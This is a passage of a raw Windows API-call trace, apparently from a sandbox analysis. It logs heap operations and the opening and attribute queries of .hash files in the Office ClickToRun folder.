hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0078.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0078.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0078.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.535] AreFileApisANSI () returned 1 [0078.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash", lpUsedDefaultChar=0x0) returned 68 [0078.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0078.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0078.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0078.535] AreFileApisANSI () returned 1 [0078.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0078.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82a78 [0078.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x82a78, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0078.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.535] GetFileType (hFile=0x430) returned 0x1 [0078.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82a78 | out: hHeap=0x20000) returned 1 [0078.536] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0078.536] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0078.536] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0078.536] CloseHandle (hObject=0x430) returned 1 [0078.536] AreFileApisANSI () returned 1 [0078.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0078.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x81fc8 [0078.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0078.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.537] GetFileType (hFile=0x430) returned 0x1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0078.537] CloseHandle (hObject=0x430) returned 1 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0078.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0078.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0078.538] AreFileApisANSI () returned 1 [0078.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0078.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82c28 [0078.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash") returned 68 [0078.538] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i640.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i640.hash"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd783a00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66)) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0078.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.539] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbc470d00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="i641033.hash", cAlternateFileName="I64103~1.HAS")) returned 1 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0078.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0078.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0078.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.540] AreFileApisANSI () returned 1 [0078.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", lpUsedDefaultChar=0x0) returned 71 [0078.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0078.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0078.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0078.540] AreFileApisANSI () returned 1 [0078.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0078.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0078.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0078.540] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.540] GetFileType (hFile=0x430) returned 0x1 [0078.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0078.541] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0078.541] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0078.541] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0078.541] CloseHandle (hObject=0x430) returned 1 [0078.541] AreFileApisANSI () returned 1 [0078.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0078.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0078.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0078.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.541] GetFileType (hFile=0x430) returned 0x1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0078.542] CloseHandle (hObject=0x430) returned 1 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0078.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.543] AreFileApisANSI () returned 1 [0078.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0078.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0078.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 71 [0078.543] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, 